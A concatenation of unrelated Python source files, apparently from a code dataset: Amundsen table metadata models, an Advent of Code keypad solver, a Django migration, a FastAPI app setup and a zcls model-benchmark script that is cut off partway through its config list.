o.append(6, 2, 'Config', 'Just config stuff')
o.append(None, None, 'Config', 'Just config stuff with no line')
main_wnd.show_all()
gtk.main()
def suite():
return unittest.TestLoader().loadTestsFromTestCase(test)
if __name__ == '__main__':
unittest.main()
|
py | 7dfacb163f7eb3a4de8117658548867c22a7e141 | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import copy
from collections import namedtuple
from typing import Any, Dict, Iterable, Iterator, List, Optional, Set, Union
from databuilder.models.cluster import cluster_constants
from databuilder.models.neo4j_csv_serde import (
Neo4jCsvSerializable, NODE_LABEL, NODE_KEY, RELATION_START_KEY, RELATION_END_KEY, RELATION_START_LABEL,
RELATION_END_LABEL, RELATION_TYPE, RELATION_REVERSE_TYPE)
from databuilder.publisher.neo4j_csv_publisher import UNQUOTED_SUFFIX
from databuilder.models.schema import schema_constant
DESCRIPTION_NODE_LABEL_VAL = 'Description'
DESCRIPTION_NODE_LABEL = DESCRIPTION_NODE_LABEL_VAL
class TagMetadata(Neo4jCsvSerializable):
TAG_NODE_LABEL = 'Tag'
TAG_KEY_FORMAT = '{tag}'
TAG_TYPE = 'tag_type'
DEFAULT_TYPE = 'default'
BADGE_TYPE = 'badge'
DASHBOARD_TYPE = 'dashboard'
METRIC_TYPE = 'metric'
def __init__(self,
name: str,
tag_type: str = 'default',
):
self._name = name
self._tag_type = tag_type
self._nodes = iter([self.create_tag_node(self._name, self._tag_type)])
self._relations: Iterator[Dict[str, Any]] = iter([])
@staticmethod
def get_tag_key(name: str) -> str:
if not name:
return ''
return TagMetadata.TAG_KEY_FORMAT.format(tag=name)
@staticmethod
def create_tag_node(name: str,
tag_type: str =DEFAULT_TYPE
) -> Dict[str, str]:
return {NODE_LABEL: TagMetadata.TAG_NODE_LABEL,
NODE_KEY: TagMetadata.get_tag_key(name),
TagMetadata.TAG_TYPE: tag_type}
def create_next_node(self) -> Optional[Dict[str, Any]]:
# return the string representation of the data
try:
return next(self._nodes)
except StopIteration:
return None
def create_next_relation(self) -> Optional[Dict[str, Any]]:
# We don't emit any relations for Tag ingestion
try:
return next(self._relations)
except StopIteration:
return None
# TODO: this should inherit from ProgrammaticDescription in amundsen-common
class DescriptionMetadata:
DESCRIPTION_NODE_LABEL = DESCRIPTION_NODE_LABEL_VAL
PROGRAMMATIC_DESCRIPTION_NODE_LABEL = 'Programmatic_Description'
DESCRIPTION_KEY_FORMAT = '{description}'
DESCRIPTION_TEXT = 'description'
DESCRIPTION_SOURCE = 'description_source'
DESCRIPTION_RELATION_TYPE = 'DESCRIPTION'
INVERSE_DESCRIPTION_RELATION_TYPE = 'DESCRIPTION_OF'
# The default editable source.
DEFAULT_SOURCE = "description"
def __init__(self,
text: Optional[str],
source: str = DEFAULT_SOURCE
):
"""
:param source: The unique source of what is populating this description.
:param text: the description text. Markdown supported.
"""
self._source = source
self._text = text
# There are so many dependencies on Description node, that it is probably easier to just separate the rest out.
if (self._source == self.DEFAULT_SOURCE):
self._label = self.DESCRIPTION_NODE_LABEL
else:
self._label = self.PROGRAMMATIC_DESCRIPTION_NODE_LABEL
@staticmethod
def create_description_metadata(text: Union[None, str],
source: Optional[str] = DEFAULT_SOURCE
) -> Optional['DescriptionMetadata']:
# We do not want to create a node if there is no description text!
if text is None:
return None
if not source:
description_node = DescriptionMetadata(text=text, source=DescriptionMetadata.DEFAULT_SOURCE)
else:
description_node = DescriptionMetadata(text=text, source=source)
return description_node
def get_description_id(self) -> str:
if self._source == self.DEFAULT_SOURCE:
return "_description"
else:
return "_" + self._source + "_description"
def __repr__(self) -> str:
return 'DescriptionMetadata({!r}, {!r})'.format(self._source, self._text)
def get_node_dict(self,
node_key: str
) -> Dict[str, str]:
return {
NODE_LABEL: self._label,
NODE_KEY: node_key,
DescriptionMetadata.DESCRIPTION_SOURCE: self._source,
DescriptionMetadata.DESCRIPTION_TEXT: self._text or '',
}
def get_relation(self,
start_node: str,
start_key: str,
end_key: str
) -> Dict[str, str]:
return {
RELATION_START_LABEL: start_node,
RELATION_END_LABEL: self._label,
RELATION_START_KEY: start_key,
RELATION_END_KEY: end_key,
RELATION_TYPE: DescriptionMetadata.DESCRIPTION_RELATION_TYPE,
RELATION_REVERSE_TYPE: DescriptionMetadata.INVERSE_DESCRIPTION_RELATION_TYPE
}
class ColumnMetadata:
COLUMN_NODE_LABEL = 'Column'
COLUMN_KEY_FORMAT = '{db}://{cluster}.{schema}/{tbl}/{col}'
COLUMN_NAME = 'name'
COLUMN_TYPE = 'type'
COLUMN_ORDER = 'sort_order{}'.format(UNQUOTED_SUFFIX) # int value needs to be unquoted when publish to neo4j
COLUMN_DESCRIPTION = 'description'
COLUMN_DESCRIPTION_FORMAT = '{db}://{cluster}.{schema}/{tbl}/{col}/{description_id}'
# Relation between column and tag
COL_TAG_RELATION_TYPE = 'TAGGED_BY'
TAG_COL_RELATION_TYPE = 'TAG'
def __init__(self,
name: str,
description: Union[str, None],
col_type: str,
sort_order: int,
tags: Union[List[str], None] = None
) -> None:
"""
TODO: Add stats
:param name:
:param description:
:param col_type:
:param sort_order:
"""
self.name = name
self.description = DescriptionMetadata.create_description_metadata(source=None,
text=description)
self.type = col_type
self.sort_order = sort_order
self.tags = tags
def __repr__(self) -> str:
return 'ColumnMetadata({!r}, {!r}, {!r}, {!r})'.format(self.name,
self.description,
self.type,
self.sort_order)
# Tuples for de-dupe purpose on Database, Cluster, Schema. See TableMetadata docstring for more information
NodeTuple = namedtuple('KeyName', ['key', 'name', 'label'])
RelTuple = namedtuple('RelKeys', ['start_label', 'end_label', 'start_key', 'end_key', 'type', 'reverse_type'])
class TableMetadata(Neo4jCsvSerializable):
"""
    Table metadata that contains columns. It implements Neo4jCsvSerializable so that it can be serialized to produce
    Table, Column and the relations between them, along with the relationship between table and schema. Additionally,
    it will create Database, Cluster, and Schema nodes with relationships between those.
    These are created here as it does not make much sense to have a separate extraction produce them. As database,
    cluster and schema would be very repetitive with low cardinality, de-duplication is performed so that the
    publisher won't need to publish the same nodes and relationships.
This class can be used for both table and view metadata. If it is a View, is_view=True should be passed in.
"""
TABLE_NODE_LABEL = 'Table'
TABLE_KEY_FORMAT = '{db}://{cluster}.{schema}/{tbl}'
TABLE_NAME = 'name'
IS_VIEW = 'is_view{}'.format(UNQUOTED_SUFFIX) # bool value needs to be unquoted when publish to neo4j
TABLE_DESCRIPTION_FORMAT = '{db}://{cluster}.{schema}/{tbl}/{description_id}'
DATABASE_NODE_LABEL = 'Database'
DATABASE_KEY_FORMAT = 'database://{db}'
DATABASE_CLUSTER_RELATION_TYPE = cluster_constants.CLUSTER_RELATION_TYPE
CLUSTER_DATABASE_RELATION_TYPE = cluster_constants.CLUSTER_REVERSE_RELATION_TYPE
CLUSTER_NODE_LABEL = cluster_constants.CLUSTER_NODE_LABEL
CLUSTER_KEY_FORMAT = '{db}://{cluster}'
CLUSTER_SCHEMA_RELATION_TYPE = schema_constant.SCHEMA_RELATION_TYPE
SCHEMA_CLUSTER_RELATION_TYPE = schema_constant.SCHEMA_REVERSE_RELATION_TYPE
SCHEMA_NODE_LABEL = schema_constant.SCHEMA_NODE_LABEL
SCHEMA_KEY_FORMAT = schema_constant.DATABASE_SCHEMA_KEY_FORMAT
SCHEMA_TABLE_RELATION_TYPE = 'TABLE'
TABLE_SCHEMA_RELATION_TYPE = 'TABLE_OF'
TABLE_COL_RELATION_TYPE = 'COLUMN'
COL_TABLE_RELATION_TYPE = 'COLUMN_OF'
TABLE_TAG_RELATION_TYPE = 'TAGGED_BY'
TAG_TABLE_RELATION_TYPE = 'TAG'
# Only for deduping database, cluster, and schema (table and column will be always processed)
serialized_nodes: Set[Any] = set()
serialized_rels: Set[Any] = set()
def __init__(self,
database: str,
cluster: str,
schema: str,
name: str,
description: Union[str, None],
columns: Iterable[ColumnMetadata] = None,
is_view: bool = False,
tags: Union[List, str] = None,
description_source: Union[str, None] = None,
**kwargs: Any
) -> None:
"""
:param database:
:param cluster:
:param schema:
:param name:
:param description:
:param columns:
:param is_view: Indicate whether the table is a view or not
:param tags:
:param description_source: Optional. Where the description is coming from. Used to compose unique id.
:param kwargs: Put additional attributes to the table model if there is any.
"""
self.database = database
self.cluster = cluster
self.schema = schema
self.name = name
self.description = DescriptionMetadata.create_description_metadata(text=description, source=description_source)
self.columns = columns if columns else []
self.is_view = is_view
self.attrs: Optional[Dict[str, Any]] = None
self.tags = TableMetadata.format_tags(tags)
if kwargs:
self.attrs = copy.deepcopy(kwargs)
self._node_iterator = self._create_next_node()
self._relation_iterator = self._create_next_relation()
def __repr__(self) -> str:
return 'TableMetadata({!r}, {!r}, {!r}, {!r} ' \
'{!r}, {!r}, {!r}, {!r})'.format(self.database,
self.cluster,
self.schema,
self.name,
self.description,
self.columns,
self.is_view,
self.tags)
def _get_table_key(self) -> str:
return TableMetadata.TABLE_KEY_FORMAT.format(db=self.database,
cluster=self.cluster,
schema=self.schema,
tbl=self.name)
def _get_table_description_key(self,
description: DescriptionMetadata) -> str:
return TableMetadata.TABLE_DESCRIPTION_FORMAT.format(db=self.database,
cluster=self.cluster,
schema=self.schema,
tbl=self.name,
description_id=description.get_description_id())
def _get_database_key(self) -> str:
return TableMetadata.DATABASE_KEY_FORMAT.format(db=self.database)
def _get_cluster_key(self) -> str:
return TableMetadata.CLUSTER_KEY_FORMAT.format(db=self.database,
cluster=self.cluster)
def _get_schema_key(self) -> str:
return TableMetadata.SCHEMA_KEY_FORMAT.format(db=self.database,
cluster=self.cluster,
schema=self.schema)
def _get_col_key(self, col: ColumnMetadata) -> str:
return ColumnMetadata.COLUMN_KEY_FORMAT.format(db=self.database,
cluster=self.cluster,
schema=self.schema,
tbl=self.name,
col=col.name)
def _get_col_description_key(self,
col: ColumnMetadata,
description: DescriptionMetadata) -> str:
return ColumnMetadata.COLUMN_DESCRIPTION_FORMAT.format(db=self.database,
cluster=self.cluster,
schema=self.schema,
tbl=self.name,
col=col.name,
description_id=description.get_description_id())
@staticmethod
def format_tags(tags: Union[List, str, None]) -> List:
if tags is None:
tags = []
if isinstance(tags, str):
tags = list(filter(None, tags.split(',')))
if isinstance(tags, list):
tags = [tag.lower().strip() for tag in tags]
return tags
def create_next_node(self) -> Union[Dict[str, Any], None]:
try:
return next(self._node_iterator)
except StopIteration:
return None
def _create_next_node(self) -> Iterator[Any]: # noqa: C901
table_node = {NODE_LABEL: TableMetadata.TABLE_NODE_LABEL,
NODE_KEY: self._get_table_key(),
TableMetadata.TABLE_NAME: self.name,
TableMetadata.IS_VIEW: self.is_view}
if self.attrs:
for k, v in self.attrs.items():
if k not in table_node:
table_node[k] = v
yield table_node
if self.description:
node_key = self._get_table_description_key(self.description)
yield self.description.get_node_dict(node_key)
# Create the table tag node
if self.tags:
for tag in self.tags:
yield TagMetadata.create_tag_node(tag)
for col in self.columns:
yield {
NODE_LABEL: ColumnMetadata.COLUMN_NODE_LABEL,
NODE_KEY: self._get_col_key(col),
ColumnMetadata.COLUMN_NAME: col.name,
ColumnMetadata.COLUMN_TYPE: col.type,
ColumnMetadata.COLUMN_ORDER: col.sort_order}
if col.description:
node_key = self._get_col_description_key(col, col.description)
yield col.description.get_node_dict(node_key)
if col.tags:
for tag in col.tags:
yield {NODE_LABEL: TagMetadata.TAG_NODE_LABEL,
NODE_KEY: TagMetadata.get_tag_key(tag),
TagMetadata.TAG_TYPE: 'default'}
# Database, cluster, schema
others = [NodeTuple(key=self._get_database_key(),
name=self.database,
label=TableMetadata.DATABASE_NODE_LABEL),
NodeTuple(key=self._get_cluster_key(),
name=self.cluster,
label=TableMetadata.CLUSTER_NODE_LABEL),
NodeTuple(key=self._get_schema_key(),
name=self.schema,
label=TableMetadata.SCHEMA_NODE_LABEL)
]
for node_tuple in others:
if node_tuple not in TableMetadata.serialized_nodes:
TableMetadata.serialized_nodes.add(node_tuple)
yield {
NODE_LABEL: node_tuple.label,
NODE_KEY: node_tuple.key,
'name': node_tuple.name
}
def create_next_relation(self) -> Union[Dict[str, Any], None]:
try:
return next(self._relation_iterator)
except StopIteration:
return None
def _create_next_relation(self) -> Iterator[Any]:
yield {
RELATION_START_LABEL: TableMetadata.SCHEMA_NODE_LABEL,
RELATION_END_LABEL: TableMetadata.TABLE_NODE_LABEL,
RELATION_START_KEY: self._get_schema_key(),
RELATION_END_KEY: self._get_table_key(),
RELATION_TYPE: TableMetadata.SCHEMA_TABLE_RELATION_TYPE,
RELATION_REVERSE_TYPE: TableMetadata.TABLE_SCHEMA_RELATION_TYPE
}
if self.description:
yield self.description.get_relation(TableMetadata.TABLE_NODE_LABEL,
self._get_table_key(),
self._get_table_description_key(self.description))
if self.tags:
for tag in self.tags:
yield {
RELATION_START_LABEL: TableMetadata.TABLE_NODE_LABEL,
RELATION_END_LABEL: TagMetadata.TAG_NODE_LABEL,
RELATION_START_KEY: self._get_table_key(),
RELATION_END_KEY: TagMetadata.get_tag_key(tag),
RELATION_TYPE: TableMetadata.TABLE_TAG_RELATION_TYPE,
RELATION_REVERSE_TYPE: TableMetadata.TAG_TABLE_RELATION_TYPE,
}
for col in self.columns:
yield {
RELATION_START_LABEL: TableMetadata.TABLE_NODE_LABEL,
RELATION_END_LABEL: ColumnMetadata.COLUMN_NODE_LABEL,
RELATION_START_KEY: self._get_table_key(),
RELATION_END_KEY: self._get_col_key(col),
RELATION_TYPE: TableMetadata.TABLE_COL_RELATION_TYPE,
RELATION_REVERSE_TYPE: TableMetadata.COL_TABLE_RELATION_TYPE
}
if col.description:
yield col.description.get_relation(ColumnMetadata.COLUMN_NODE_LABEL,
self._get_col_key(col),
self._get_col_description_key(col, col.description))
if col.tags:
for tag in col.tags:
yield {
RELATION_START_LABEL: TableMetadata.TABLE_NODE_LABEL,
RELATION_END_LABEL: TagMetadata.TAG_NODE_LABEL,
RELATION_START_KEY: self._get_table_key(),
RELATION_END_KEY: TagMetadata.get_tag_key(tag),
RELATION_TYPE: ColumnMetadata.COL_TAG_RELATION_TYPE,
RELATION_REVERSE_TYPE: ColumnMetadata.TAG_COL_RELATION_TYPE,
}
others = [
RelTuple(start_label=TableMetadata.DATABASE_NODE_LABEL,
end_label=TableMetadata.CLUSTER_NODE_LABEL,
start_key=self._get_database_key(),
end_key=self._get_cluster_key(),
type=TableMetadata.DATABASE_CLUSTER_RELATION_TYPE,
reverse_type=TableMetadata.CLUSTER_DATABASE_RELATION_TYPE),
RelTuple(start_label=TableMetadata.CLUSTER_NODE_LABEL,
end_label=TableMetadata.SCHEMA_NODE_LABEL,
start_key=self._get_cluster_key(),
end_key=self._get_schema_key(),
type=TableMetadata.CLUSTER_SCHEMA_RELATION_TYPE,
reverse_type=TableMetadata.SCHEMA_CLUSTER_RELATION_TYPE)
]
for rel_tuple in others:
if rel_tuple not in TableMetadata.serialized_rels:
TableMetadata.serialized_rels.add(rel_tuple)
yield {
RELATION_START_LABEL: rel_tuple.start_label,
RELATION_END_LABEL: rel_tuple.end_label,
RELATION_START_KEY: rel_tuple.start_key,
RELATION_END_KEY: rel_tuple.end_key,
RELATION_TYPE: rel_tuple.type,
RELATION_REVERSE_TYPE: rel_tuple.reverse_type
}
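# Illustrative sketch of how a TableMetadata instance is drained by a loader; the
# table and column below are invented placeholders, and the calls mirror the
# Neo4jCsvSerializable contract used above.
def _example_table_metadata_usage() -> None:
    table = TableMetadata(
        database='hive',
        cluster='gold',
        schema='core',
        name='fact_orders',
        description='Orders fact table',
        columns=[ColumnMetadata('order_id', 'primary key', 'bigint', 0)],
        tags='finance,core',
    )
    node = table.create_next_node()
    while node:
        print(node)  # Table, Description, Tag, Column and deduped Database/Cluster/Schema dicts
        node = table.create_next_node()
    relation = table.create_next_relation()
    while relation:
        print(relation)  # schema-table, description, tag and column relation dicts
        relation = table.create_next_relation()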
|
py | 7dfacb791f5c44bfb9615a7325406b4385c0d414 | class Keypad:
def __init__(self, start=5):
"""Set the number of the keypad to start on."""
self.position = start
self.above = {1: 1, 2: 2, 3: 1, 4: 4, 5: 5, 6: 2, 7: 3, 8: 4, 9: 9,
'A': 6, 'B': 7, 'C': 8, 'D': 'B'}
self.below = {1: 3, 2: 6, 3: 7, 4: 8, 5: 5, 6: 'A', 7: 'B', 8: 'C',
9: 9, 'A': 'A', 'B': 'D', 'C': 'C', 'D': 'D'}
self.onRight = {1: 1, 2: 3, 3: 4, 4: 4, 5: 6, 6: 7, 7: 8, 8: 9, 9: 9,
'A': 'B', 'B': 'C', 'C': 'C', 'D': 'D'}
self.onLeft = {1: 1, 2: 2, 3: 2, 4: 3, 5: 5, 6: 5, 7: 6, 8: 7, 9: 8,
'A': 'A', 'B': 'A', 'C': 'B', 'D': 'D'}
def up(self):
"""Move position up."""
self.position = self.above[self.position]
def down(self):
"""Move position down."""
self.position = self.below[self.position]
def right(self):
"""Move position right."""
self.position = self.onRight[self.position]
def left(self):
"""Move position left."""
self.position = self.onLeft[self.position]
def move(self, dir):
"""Move the position of your finger."""
if dir.upper() == 'U':
self.up()
if dir.upper() == 'D':
self.down()
if dir.upper() == 'R':
self.right()
if dir.upper() == 'L':
self.left()
def getPos(self):
"""Return your fingers position."""
return self.position
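# Quick sanity sketch (assumed example): on this diamond keypad the instruction
# line "ULL" starting from key 5 stays on 5, because moving up or left from 5 is
# blocked at the keypad edge.
def _trace_sample_line():
    """Return the key reached after following 'ULL' from the start position."""
    pad = Keypad()
    for move in 'ULL':
        pad.move(move)
    return pad.getPos()  # -> 5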
def main():
"""Run main function."""
keypad = Keypad()
code = []
with open('data/day2data.txt', 'r') as f:
moveList = f.readlines()
for line in moveList:
line.split()
for move in line:
keypad.move(move)
code.append(keypad.getPos())
print('Your bathroom access code is: {}').format(code)
if __name__ == '__main__':
main()
|
py | 7dfacb89ad7323ebea4d85962bc26d4fc98125bf | # Generated by Django 2.2 on 2019-04-30 11:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("motions", "0024_state_restriction_3")]
operations = [
migrations.AddField(
model_name="motion",
name="category_weight",
field=models.IntegerField(default=10000),
)
]
|
py | 7dfacc839ead2e02d4ed30f2afe70d302068aa8b | from fastapi import FastAPI
from fastapi.responses import JSONResponse
from app.api.routers import users
from app.api.routers import permissions
from app.api.routers import notes
from app.api.routers import user_groups
from app.config import settings
from app.errors.api import ApiError, UnknownApiError
tags_metadata = [
{
"name": "auth",
"description": "Authenticate operations"
},
{
"name": "admin",
"description": "Admin operations"
},
{
"name": "users",
"description": "Operations with users"
},
{
"name": "notes",
"description": "Operation with notes"
},
]
app = FastAPI(
title=settings.APP_NAME,
description="This is a sas-kodzi project, with auto docs for the API and everything",
version="0.2.0",
openapi_tags=tags_metadata
)
app.include_router(users.router)
app.include_router(user_groups.router)
app.include_router(permissions.router)
app.include_router(notes.router)
# todo: log requests in error handlers -> read about fast api logging first
# noinspection PyUnusedLocal
@app.exception_handler(ApiError)
def handle_api_error(request, error: ApiError):
"""
Api error handler.
todo: how to utilize request ? -> error logging ???
"""
return JSONResponse(
status_code=error.status_code,
content={'message': error.error_message.message}
)
# noinspection PyUnusedLocal
@app.exception_handler(Exception)
def handle_unknown_api_error(request, exception: Exception):
"""
Unknown Api error handler 500 - bug :(
"""
error = UnknownApiError(f'{exception.__class__.__name__} - {str(exception)}')
return JSONResponse(
status_code=error.status_code,
content={'message': error.error_message.message}
)
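# Illustrative sketch for running the API locally (assumes uvicorn is installed;
# the real project may start the app differently, e.g. via a container entrypoint).
if __name__ == "__main__":
    import uvicorn
    uvicorn.run(app, host="127.0.0.1", port=8000)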
|
py | 7dfacc9abf1065e3a06cecd88c2211e284e8cd33 | # coding: utf-8
import chainer
def h(x, y):
    return x + y + y + y
|
py | 7dfacca23d6b2815f09226a6534fd3ce225def7f | # -*- coding: utf-8 -*-
"""
@date: 2020/11/4 下午2:06
@file: benchmarks.py
@author: zj
@description:
"""
import time
import numpy as np
import torch
from zcls.util.metrics import compute_num_flops
from zcls.config import get_cfg_defaults
from zcls.model.recognizers.build import build_recognizer
def compute_model_time(data_shape, model, device):
model = model.to(device)
t1 = 0.0
num = 100
begin = time.time()
for i in range(num):
data = torch.randn(data_shape)
start = time.time()
model(data.to(device=device, non_blocking=True))
if i > num // 2:
t1 += time.time() - start
t2 = time.time() - begin
    print(f'one pass needs {t2 / num:.3f}s on average, model compute needs {t1 / (num // 2):.3f}s')
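# Illustrative sketch (assumes torchvision is installed next to torch) showing how
# compute_model_time can be used on a stock model outside of the zcls configs.
def _demo_compute_model_time():
    import torchvision
    model = torchvision.models.resnet18()  # randomly initialised weights are fine for timing
    model.eval()
    compute_model_time((1, 3, 224, 224), model, torch.device('cpu'))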
def main(data_shape, config_file, mobile_name):
cfg = get_cfg_defaults()
cfg.merge_from_file(config_file)
np.random.seed(cfg.RNG_SEED)
torch.manual_seed(cfg.RNG_SEED)
torch.backends.cudnn.deterministic = False
torch.backends.cudnn.benchmark = True
# gpu_device = torch.device('cuda:0')
cpu_device = torch.device('cpu')
model = build_recognizer(cfg, cpu_device)
model.eval()
data = torch.randn(data_shape).to(device=cpu_device, non_blocking=True)
GFlops, params_size = compute_num_flops(model, data)
print(f'{mobile_name} ' + '*' * 10)
print(f'device: {cpu_device}')
print(f'GFlops: {GFlops:.3f}G')
print(f'Params Size: {params_size:.3f}MB')
model = build_recognizer(cfg, cpu_device)
model.eval()
print(f'compute cpu infer time')
compute_model_time(data_shape, model, cpu_device)
# print(f'compute gpu infer time')
# compute_model_time(data_shape, model, gpu_device)
del model
torch.cuda.empty_cache()
def mobilenet():
data_shape = (1, 3, 224, 224)
cfg_file_list = [
'configs/benchmarks/mobilenet/mobilenet_v3_large_x1_0_torchvision_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mobilenet_v3_small_x1_0_torchvision_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mnasnet_b1_0_5_torchvision_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mnasnet_b1_0_5_zcls_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mnasnet_b1_1_0_torchvision_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mnasnet_b1_1_0_zcls_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mobilenet_v2_torchvision_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mobilenet_v2_zcls_imagenet_224.yaml',
]
name_list = [
'mobilenet_v3_large_x1_0',
'mobilenet_v3_small_x1_0',
'mnasnet_b1_0_5_torchvision',
'mnasnet_b1_0_5_zcls',
'mnasnet_b1_1_0_torchvision',
'mnasnet_b1_1_0_zcls',
'mobilenet_v2_torchvision',
'mobilenet_v2_zcls',
]
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
main(data_shape, cfg_file, name)
def shufflenet_v1():
data_shape = (1, 3, 224, 224)
cfg_file_list = [
'configs/benchmarks/shufflenet/shufflenet_v1_3g0_5x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_3g1_5x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_3g1x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_3g2x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_8g0_5x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_8g1_5x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_8g1x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_8g2x_zcls_imagenet_224.yaml',
]
name_list = [
'shufflenet_v1_3g0_5x_zcls',
'shufflenet_v1_3g1_5x_zcls',
'shufflenet_v1_3g1x_zcls',
'shufflenet_v1_3g2x_zcls',
'shufflenet_v1_8g0_5x_zcls',
'shufflenet_v1_8g1_5x_zcls',
'shufflenet_v1_8g1x_zcls',
'shufflenet_v1_8g2x_zcls',
]
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
main(data_shape, cfg_file, name)
def shufflenet_v2():
data_shape = (1, 3, 224, 224)
cfg_file_list = [
'configs/benchmarks/shufflenet/shufflenet_v2_x0_5_torchvision_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v2_x0_5_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v2_x1_0_torchvision_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v2_x1_0_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v2_x1_5_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v2_x2_0_zcls_imagenet_224.yaml',
]
name_list = [
'shufflenet_v2_x0_5_torchvision',
'shufflenet_v2_x0_5_zcls',
'shufflenet_v2_x1_0_torchvision',
'shufflenet_v2_x1_0_zcls',
'shufflenet_v2_x1_5_zcls',
'shufflenet_v2_x2_0_zcls',
]
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
main(data_shape, cfg_file, name)
def resnet():
data_shape = (1, 3, 224, 224)
cfg_file_list = [
'configs/benchmarks/resnet/r18_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/r18_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/r34_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/r34_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/r50_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/r50_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/r101_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/r101_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/r152_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/r152_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/rxt50_32x4d_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/rxt50_32x4d_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/rxt101_32x8d_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/rxt101_32x8d_zcls_imagenet_224.yaml',
]
name_list = [
'r18_torchvision',
'r18_zcls',
'r34_torchvision',
'r34_zcls',
'r50_torchvision',
'r50_zcls',
'r101_torchvision',
'r101_zcls',
'r152_torchvision',
'r152_zcls',
'rxt50_32x4d_torchvision',
'rxt50_32x4d_zcls',
'rxt101_32x8d_torchvision',
'rxt101_32x8d_zcls',
]
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
main(data_shape, cfg_file, name)
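# Benchmark RepVGG configs; both train-time and inference-time (re-parameterized) structures are listed,
# so the input size (224 or 320) is inferred from each config file name below.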
def repvgg():
cfg_file_list = [
'configs/benchmarks/repvgg/repvgg_a0_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_a0_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_a1_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_a1_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_a2_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_a2_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b0_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b0_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b1_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b1_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b1g2_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b1g2_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b1g4_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b1g4_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b2_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b2_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b2g4_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b2g4_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b3_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b3_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b3g4_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b3g4_infer_zcls_imagenet_320.yaml',
'configs/benchmarks/repvgg/repvgg_b3g4_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b3g4_train_zcls_imagenet_320.yaml',
'configs/benchmarks/repvgg/repvgg_d2se_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_d2se_infer_zcls_imagenet_320.yaml',
'configs/benchmarks/repvgg/repvgg_d2se_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_d2se_train_zcls_imagenet_320.yaml',
]
name_list = [
'repvgg_a0_infer_zcls',
'repvgg_a0_train_zcls',
'repvgg_a1_infer_zcls',
'repvgg_a1_train_zcls',
'repvgg_a2_infer_zcls',
'repvgg_a2_train_zcls',
'repvgg_b0_infer_zcls',
'repvgg_b0_train_zcls',
'repvgg_b1_infer_zcls',
'repvgg_b1_train_zcls',
'repvgg_b1g2_infer_zcls',
'repvgg_b1g2_train_zcls',
'repvgg_b1g4_infer_zcls',
'repvgg_b1g4_train_zcls',
'repvgg_b2_infer_zcls',
'repvgg_b2_train_zcls',
'repvgg_b2g4_infer_zcls',
'repvgg_b2g4_train_zcls',
'repvgg_b3_infer_zcls',
'repvgg_b3_train_zcls',
'repvgg_b3g4_infer_zcls_224',
